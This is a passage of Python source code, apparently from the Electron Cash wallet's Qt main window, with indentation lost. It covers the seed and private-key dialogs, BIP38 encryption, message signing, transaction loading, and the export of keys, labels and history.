sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.svg"), _("Preferences"), self.settings_dialog))
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog)
sb.addPermanentWidget(self.seed_button)
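# A weak reference is captured by the lambda below so the status button's
# callback cannot keep this window alive after it is closed.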
weakSelf = Weak.ref(self)
gui_object = self.gui_object
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.svg"), _("Network"), lambda: gui_object.show_network_dialog(weakSelf()))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def on_update_available(self, b):
self.update_available_button.setVisible(bool(b))
# The popup label won't really be shown unless this window is
# on top... but regardless we give each label a unique internal name
# so they don't interfere with each other.
lblName = "UpdateAvailable_" + self.diagnostic_name()
if b:
ShowPopupLabel(name = lblName,
text="<center><b>{}</b><br><small>{}</small></center>".format(_("Update Available"),_("Click for details")),
target=self.update_available_button,
timeout=20000, onClick=self.update_available_button.click,
onRightClick=self.update_available_button.click,
dark_mode = ColorScheme.dark_scheme)
else:
# Immediately kills any extant labels
KillPopupLabel(lblName)
def update_lock_icon(self):
icon = QIcon(":icons/lock.svg") if self.wallet.has_password() else QIcon(":icons/unlock.svg")
tip = _('Wallet Password') + ' - '
tip += _('Enabled') if self.wallet.has_password() else _('Disabled')
self.password_button.setIcon(icon)
self.password_button.setStatusTip(tip)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
self.preview_button.setVisible(True)
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self.top_level_window(), self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
self.gui_object.cache_password(self.wallet, None) # clear password cache when user changes it, just in case
run_hook("on_new_password", self, password, new_password)
except BaseException as e:
# (a second bare 'except:' clause here would be unreachable --
# BaseException already catches everything)
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def get_passphrase_dialog(self, msg : str, title : str = None, *, permit_empty = False) -> str:
from .password_dialog import PassphraseDialog
d = PassphraseDialog(self.wallet, self.top_level_window(), msg, title, permit_empty = permit_empty)
return d.run()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.balance_label.setHidden(True)
self.statusBar().insertWidget(0, self._search_box_spacer)
self._search_box_spacer.show()
self.search_box.setFocus(1)
if self.search_box.text():
self.do_search(self.search_box.text())
else:
self._search_box_spacer.hide()
self.statusBar().removeWidget(self._search_box_spacer)
self.balance_label.setHidden(False)
self.do_search('')
def do_search(self, t):
'''Apply search text to all tabs. FIXME: if a plugin later is loaded
it will not receive the search filter -- but most plugins I know about
do not support searchable_list anyway, so hopefully it's a non-issue.'''
for i in range(self.tabs.count()):
tab = self.tabs.widget(i)
try:
tab.searchable_list.filter(t)
except (AttributeError, TypeError):
pass
def new_contact_dialog(self):
d = WindowModalDialog(self.top_level_window(), _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(350)
line2 = QLineEdit()
line2.setFixedWidth(350)
grid.addWidget(QLabel(_("Name")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Address")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
name = line1.text().strip()
address = line2.text().strip()
prefix = networks.net.CASHADDR_PREFIX.lower() + ':'
if address.lower().startswith(prefix):
address = address[len(prefix):]
self.set_contact(name, address)
def lookup_cash_account_dialog(self):
blurb = "<br><br>" + _('Enter a string of the form <b>name#<i>number</i></b>')
cashacctqt.lookup_cash_account_dialog(self, self.wallet, blurb=blurb,
add_to_contacts_button = True, pay_to_button = True)
def show_master_public_keys(self):
dialog = WindowModalDialog(self.top_level_window(), _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton()
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
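# @protected prompts the user for the wallet password (if any) and passes it
# to the wrapped method as the 'password' argument.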
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path) # implicitly also calls stop_wallet
self.update_recently_visited(wallet_path) # this ensures it's deleted from the menu
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
self.close()
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password) # may be None or ''
derivation = keystore.has_derivation() and keystore.derivation # may be None or ''
seed_type = getattr(keystore, 'seed_type', '')
if derivation == 'm/' and seed_type in ['electrum', 'standard']:
derivation = None # suppress Electrum seed 'm/' derivation from UI
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self.top_level_window(), seed, passphrase, derivation, seed_type)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
d.setParent(None) # Help Python GC this sooner rather than later
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_message(str(e))
return
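# the first element of the deserialized key tuple is the script type (e.g. 'p2pkh')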
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self.top_level_window(), _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel('{}: {}'.format(_("Address"), address)))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
pk_lbl = QLabel(_("Private key") + ':')
vbox.addWidget(pk_lbl)
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton()
# BIP38 Encrypt Button
def setup_encrypt_button():
encrypt_but = QPushButton(_("Encrypt BIP38") + "...")
# make the button's font one point smaller
f = encrypt_but.font()
f.setPointSize(f.pointSize() - 1)
encrypt_but.setFont(f)
encrypt_but.setEnabled(bool(bitcoin.Bip38Key.canEncrypt()))
encrypt_but.setToolTip(_("Encrypt this private key using BIP38 encryption")
if encrypt_but.isEnabled() else
_("BIP38 encryption unavailable: install pycryptodomex to enable"))
border_color = ColorScheme.DEFAULT.as_color(False)
border_color.setAlphaF(0.65)
encrypt_but_ss_en = (
keys_e.styleSheet() + (("QPushButton { border: 1px solid %s; border-radius: 6px; padding: 2px; margin: 2px; } "
"QPushButton:hover { border: 1px solid #3daee9; } "
"QPushButton:disabled { border: 1px solid transparent; } ") % (border_color.name(QColor.HexArgb)))
)
encrypt_but_ss_dis = ( keys_e.styleSheet() )
encrypt_but.setStyleSheet(encrypt_but_ss_en if encrypt_but.isEnabled() else encrypt_but_ss_dis)
def on_encrypt():
passphrase = self.get_passphrase_dialog(
msg = (
_("Specify a passphrase to use for BIP38 encryption.") + "\n" +
_("Save this passphrase if you save the generated key so you may decrypt it later.")
)
)
if not passphrase:
return
try:
bip38 = str(bitcoin.Bip38Key.encrypt(pk, passphrase))
keys_e.setText(bip38)
encrypt_but.setEnabled(False)
encrypt_but.setStyleSheet(encrypt_but_ss_dis)
pk_lbl.setText( _("BIP38 Key") + ":" )
self.show_message(_("WIF key has been encrypted using BIP38.\n\n"
"You may save this encrypted key to a file or print out its QR code and/or text.\n\n"
"It is strongly encrypted with the passphrase you specified and safe to store electronically. "
"However, the passphrase should be stored securely and not shared with anyone."))
except Exception as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
encrypt_but.clicked.connect(on_encrypt)
keys_e.addWidget(encrypt_but, 0)
setup_encrypt_button()
# /BIP38 Encrypt Button
vbox.addWidget(keys_e)
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=address.to_script().hex())
rds_e.addCopyButton()
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
try:
addr = Address.from_string(address)
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
if addr.kind != addr.ADDR_P2PKH:
msg_sign = ( _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' +
_('The operation is undefined. Not just in Electron Cash, but in general.') )
self.show_message(_('Cannot sign messages with this type of address.') + '\n\n' + msg_sign)
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(addr):
self.show_message(_('Address not in wallet.'))
return
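# run the actual signing on the wallet's worker thread so the GUI stays
# responsive; show_signed_message is called back with the result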
task = partial(self.wallet.sign_message, addr, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
try:
address = Address.from_string(address.text().strip())
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
message = message.toPlainText().strip().encode('utf-8')
try:
# This can throw on invalid base64
sig = base64.b64decode(signature.toPlainText())
verified = bitcoin.verify_message(address, sig, message)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=None):
d = WindowModalDialog(self.top_level_window(), _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address.to_ui_string() if address else '')
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_warning(str(e))
def encrypt_message(self, address=None):
d = WindowModalDialog(self.top_level_window(), _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
if not isinstance(pubkey, str):
pubkey = pubkey.to_ui_string()
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
return PasswordDialog(parent, msg).run()
def tx_from_text(self, txt):
from electroncash.transaction import tx_from_str
try:
txt_tx = tx_from_str(txt)
tx = Transaction(txt_tx, sign_schnorr=self.wallet.is_schnorr_enabled())
tx.deserialize()
if self.wallet:
my_coins = self.wallet.get_spendable_coins(None, self.config)
my_outpoints = [vin['prevout_hash'] + ':' + str(vin['prevout_n']) for vin in my_coins]
for i, txin in enumerate(tx.inputs()):
outpoint = txin['prevout_hash'] + ':' + str(txin['prevout_n'])
if outpoint in my_outpoints:
my_index = my_outpoints.index(outpoint)
tx._inputs[i]['value'] = my_coins[my_index]['value']
return tx
except:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_critical(_("Electron Cash was unable to parse your transaction"))
return
# Due to the asynchronous nature of the qr reader we need to keep the
# dialog instance as member variable to prevent reentrancy/multiple ones
# from being presented at once.
_qr_dialog = None
def read_tx_from_qrcode(self):
if self._qr_dialog:
# Re-entrancy prevention -- there is some lag between when the user
# taps the QR button and the modal dialog appears. We want to
# prevent multiple instances of the dialog from appearing, so we
# must do this.
self.print_error("Warning: QR dialog is already presented, ignoring.")
return
if self.gui_object.warn_if_cant_import_qrreader(self):
return
from electroncash import get_config
from .qrreader import QrReaderCameraDialog
data = ''
self._qr_dialog = None
try:
self._qr_dialog = QrReaderCameraDialog(parent=self.top_level_window())
def _on_qr_reader_finished(success: bool, error: str, result):
if self._qr_dialog:
self._qr_dialog.deleteLater()
self._qr_dialog = None
if not success:
if error:
self.show_error(error)
return
if not result:
return
# if the user scanned a bitcoincash URI
if result.lower().startswith(networks.net.CASHADDR_PREFIX + ':'):
self.pay_to_URI(result)
return
# else if the user scanned an offline signed tx
try:
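# Electrum-family wallets encode raw transactions in base43 for QR codes
# (alphanumeric QR mode packs more densely than byte mode); decode to hex first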
result = bh2u(bitcoin.base_decode(result, length=None, base=43))
tx = self.tx_from_text(result) # will show an error dialog on error
if not tx:
return
except BaseException as e:
self.show_error(str(e))
return
self.show_transaction(tx)
self._qr_dialog.qr_finished.connect(_on_qr_reader_finished)
self._qr_dialog.start_scan(get_config().get_video_device())
except BaseException as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self._qr_dialog = None
self.show_error(str(e))
def read_tx_from_file(self, *, fileName = None):
fileName = fileName or self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r", encoding='utf-8') as f:
file_content = f.read()
file_content = file_content.strip()
tx_file_dict = json.loads(str(file_content))
except (ValueError, IOError, OSError, json.decoder.JSONDecodeError) as reason:
self.show_critical(_("Electron Cash was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
tx = self.tx_from_text(file_content)
return tx
def do_process_from_text(self):
from electroncash.transaction import SerializationError
text = text_dialog(self.top_level_window(), _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_file(self, *, fileName = None):
from electroncash.transaction import SerializationError
try:
tx = self.read_tx_from_file(fileName=fileName)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_txid(self, *, txid=None, parent=None, tx_desc=None):
parent = parent or self
if self.gui_object.warn_if_no_network(parent):
return
from electroncash import transaction
ok = txid is not None
if not ok:
txid, ok = QInputDialog.getText(parent, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
ok, r = self.network.get_raw_tx_for_txid(txid, timeout=10.0)
if not ok:
parent.show_message(_("Error retrieving transaction") + ":\n" + r)
return
tx = transaction.Transaction(r, sign_schnorr=self.wallet.is_schnorr_enabled()) # note that presumably the tx is already signed if it comes from blockchain so this sign_schnorr parameter is superfluous, but here to satisfy my OCD -Calin
self.show_transaction(tx, tx_desc=tx_desc)
def export_bip38_dialog(self):
''' Convenience method. Simply calls self.export_privkeys_dialog(bip38=True) '''
self.export_privkeys_dialog(bip38 = True)
@protected
def export_privkeys_dialog(self, password, *, bip38=False):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
if bip38:
self.show_error(_('WARNING: This is a multi-signature wallet.') + '\n' +
_("It cannot be used with BIP38 encrypted keys."))
return
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.'))
if bip38:
if not bitcoin.Bip38Key.canEncrypt() or not bitcoin.Bip38Key.isFast():
self.show_error(_("BIP38 Encryption is not available. Please install 'pycryptodomex' and restart Electron Cash to enable BIP38."))
return
passphrase = self.get_passphrase_dialog(
msg = (
_("You are exporting your wallet's private keys as BIP38 encrypted keys.") + "\n\n" +
_("You must specify a passphrase to use for encryption.") + "\n" +
_("Save this passphrase so you may decrypt your BIP38 keys later.")
)
)
if not passphrase:
# user cancel
return
bip38 = passphrase # overwrite arg with passphrase.. for use down below ;)
class MyWindowModalDialog(WindowModalDialog):
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
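# pyqtSignal only works as a class attribute of a QObject subclass -- signals
# cannot be added to an instance after the fact, hence this throwaway subclass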
d = MyWindowModalDialog(self.top_level_window(), _('Private keys'))
weak_d = Weak.ref(d)
d.setObjectName('WindowModalDialog - Private Key Export')
destroyed_print_error(d) # track object lifecycle
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
lines = [ _("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties.") ]
if bip38:
del lines[0] # No need to scream-WARN them since BIP38 *are* encrypted
msg = '\n'.join(lines)
vbox.addWidget(QLabel(msg))
if bip38:
wwlbl = WWLabel()
def set_ww_txt(pf_shown=False):
if pf_shown:
pf_text = ( ("<font face='{monoface}' size=+1><b>".format(monoface=MONOSPACE_FONT))
+ bip38
+ ('</b></font> <a href="hide">{link}</a>'.format(link=_("Hide"))) )
else:
pf_text = '<a href="show">{link}</a>'.format(link=_("Click to show"))
wwlbl.setText(
_("The below keys are BIP38 <i>encrypted</i> using the passphrase: {passphrase}<br>"
"Please <i>write this passphrase down</i> and store it in a secret place, separate from these encrypted keys."
).format(passphrase=pf_text)
)
def toggle_ww_txt(link):
set_ww_txt(link=="show")
set_ww_txt()
wwlbl.linkActivated.connect(toggle_ww_txt)
vbox.addWidget(wwlbl)
e = QTextEdit()
e.setFont(QFont(MONOSPACE_FONT))
e.setWordWrapMode(QTextOption.NoWrap)
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electron-cash-private-keys.csv' if not bip38 else 'electron-cash-bip38-keys.csv'
select_msg = _('Select file to export your private keys to')
box, filename_e, csv_button = filename_field(self.config, defaultname, select_msg)
vbox.addSpacing(12)
vbox.addWidget(box)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
stop = False
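# the worker below never touches Qt widgets directly; it reports back to the
# GUI thread exclusively via the two signals declared on the dialog above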
def privkeys_thread():
for addr in addresses:
if not bip38:
# This artificial sleep is likely a security / paranoia measure
# to allow user to cancel or to make the process "feel expensive".
# In the bip38 case it's already slow enough so this delay
# is not needed.
time.sleep(0.100)
if stop:
return
try:
privkey = self.wallet.export_private_key(addr, password)
if bip38 and privkey:
privkey = str(bitcoin.Bip38Key.encrypt(privkey, bip38)) # __str__() -> base58 encoded bip38 key
except InvalidPassword:
# See #921 -- possibly a corrupted wallet or other strangeness
privkey = 'INVALID_PASSWORD'
private_keys[addr.to_ui_string()] = privkey
strong_d = weak_d()
try:
if strong_d and not stop:
strong_d.computing_privkeys_signal.emit()
else:
return
finally:
del strong_d
if stop:
return
strong_d = weak_d()
if strong_d:
strong_d.show_privkeys_signal.emit()
def show_privkeys():
nonlocal stop
if stop:
return
s = "\n".join('{:45} {}'.format(addr, privkey)
for addr, privkey in private_keys.items())
e.setText(s)
b.setEnabled(True)
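# everything is displayed; flag the worker to stop so no further signals fire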
stop = True
thr = None
def on_dialog_closed(*args):
nonlocal stop
stop = True
try: d.computing_privkeys_signal.disconnect()
except TypeError: pass
try: d.show_privkeys_signal.disconnect()
except TypeError: pass
try: d.finished.disconnect()
except TypeError: pass
if thr and thr.is_alive():
thr.join(timeout=1.0) # wait for thread to end for maximal GC mojo
def computing_privkeys_slot():
if stop:
return
e.setText(_("Please wait... {num}/{total}").format(num=len(private_keys),total=len(addresses)))
d.computing_privkeys_signal.connect(computing_privkeys_slot)
d.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
thr = threading.Thread(target=privkeys_thread, daemon=True)
thr.start()
res = d.exec_()
if not res:
stop = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electron Cash was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+", encoding='utf-8') as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r', encoding='utf-8') as f: # always ensure UTF-8. See issue #1453.
data = f.read()
data = json.loads(data)
if type(data) is not dict or not len(data) or not all(type(v) is str and type(k) is str for k,v in data.items()):
self.show_critical(_("The file you selected does not appear to contain labels."))
return
for key, value in data.items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, OSError, json.decoder.JSONDecodeError) as reason:
self.show_critical(_("Electron Cash was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
self.utxo_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electron-cash_labels.json', "*.json")
if fileName:
with open(fileName, 'w+', encoding='utf-8') as f: # always ensure UTF-8. See issue #1453.
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self.top_level_window(), _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electron-cash-history.csv')
select_msg = _('Select file to export your wallet transactions to')
box, filename_e, csv_button = filename_field(self.config, defaultname, select_msg)
vbox.addWidget(box)
include_addresses_chk = QCheckBox(_("Include addresses"))
include_addresses_chk.setChecked(True)
include_addresses_chk.setToolTip(_("Include input and output addresses in history export"))
vbox.addWidget(include_addresses_chk)
fee_dl_chk = QCheckBox(_("Fetch accurate fees from network (slower)"))
fee_dl_chk.setChecked(self.is_fetch_input_data())
fee_dl_chk.setEnabled(bool(self.wallet.network))
fee_dl_chk.setToolTip(_("If this is checked, accurate fee and input value data will be retrieved from the network"))
vbox.addWidget(fee_dl_chk)
fee_time_w = QWidget()
fee_time_w.setToolTip(_("The amount of overall time in seconds to allow for downloading fee data before giving up"))
hbox = QHBoxLayout(fee_time_w)
hbox.setContentsMargins(20, 0, 0, 0)
hbox.addWidget(QLabel(_("Timeout:")), 0, Qt.AlignRight)
fee_time_sb = QSpinBox()
fee_time_sb.setMinimum(10)
fee_time_sb.setMaximum(9999)
fee_time_sb.setSuffix(" " + _("seconds"))
fee_time_sb.setValue(30)
fee_dl_chk.clicked.connect(fee_time_w.setEnabled)
fee_time_w.setEnabled(fee_dl_chk.isChecked())
hbox.addWidget(fee_time_sb, 0, Qt.AlignLeft)
hbox.addStretch(1)
vbox.addWidget(fee_time_w)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
res = d.exec_()
d.setParent(None) # for python GC
if not res:
return
filename = filename_e.text()
if not filename:
return
success = False
try:
# minimum 10s time for calc. fees, etc
timeout = max(fee_time_sb.value() if fee_dl_chk.isChecked() else 10.0, 10.0)
success = self.do_export_history(filename, csv_button.isChecked(),
download_inputs=fee_dl_chk.isChecked(),
timeout=timeout,
include_addresses=include_addresses_chk.isChecked())
except Exception as reason:
export_error_label = _("Electron Cash was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
else:
if success:
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def is_fetch_input_data(self):
''' default on if network.auto_connect is True, otherwise use config value '''
return bool(self.wallet and self.wallet.network and self.config.get('fetch_input_data', self.wallet.network.auto_connect))
def set_fetch_input_data(self, b):
self.config.set_key('fetch_input_data', bool(b))
def do_export_history(self, fileName, is_csv, *, download_inputs=False, timeout=30.0, include_addresses=True):
wallet = self.wallet
if not wallet:
return
dlg = None # this will be set at the bottom of this function
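# task() runs on a background thread owned by the WaitingDialog below;
# on_success / self.on_error are delivered on the GUI thread when it finishes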
def task():
def update_prog(x):
if dlg: dlg.update_progress(int(x*100))
return wallet.export_history(fx=self.fx,
show_addresses=include_addresses,
decimal_point=self.decimal_point,
fee_calc_timeout=timeout,
download_inputs=download_inputs,
progress_callback=update_prog)
success = False
def on_success(history):
nonlocal success
ccy = (self.fx and self.fx.get_currency()) or ''
has_fiat_columns = history and self.fx and self.fx.show_history() and 'fiat_value' in history[0] and 'fiat_balance' in history[0] and 'fiat_fee' in history[0]
lines = []
for item in history:
if is_csv:
cols = [item['txid'], item.get('label', ''), item['confirmations'], item['value'], item['fee'], item['date']]
if has_fiat_columns:
cols += [item['fiat_value'], item['fiat_balance'], item['fiat_fee']]
if include_addresses:
inaddrs_filtered = (x for x in (item.get('input_addresses') or [])
if Address.is_valid(x))
outaddrs_filtered = (x for x in (item.get('output_addresses') or [])
if Address.is_valid(x))
cols.append( ','.join(inaddrs_filtered) )
cols.append( ','.join(outaddrs_filtered) )
lines.append(cols)
else:
if has_fiat_columns and ccy:
item['fiat_currency'] = ccy # add the currency to each entry in the json. this wastes space but json is bloated anyway so this won't hurt too much, we hope
elif not has_fiat_columns:
# No need to include these fields as they will always be 'No Data'
item.pop('fiat_value', None)
item.pop('fiat_balance', None)
item.pop('fiat_fee', None)
lines.append(item)
with open(fileName, "w+", encoding="utf-8") as f: # ensure encoding to utf-8. Avoid Windows cp1252. See #1453.
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
cols = ["transaction_hash","label", "confirmations", "value", "fee", "timestamp"]
if has_fiat_columns:
cols += [f"fiat_value_{ccy}", f"fiat_balance_{ccy}", f"fiat_fee_{ccy}"] # in CSV mode, we use column names eg fiat_value_USD, etc
if include_addresses:
cols += ["input_addresses", "output_addresses"]
transaction.writerow(cols)
for line in lines:
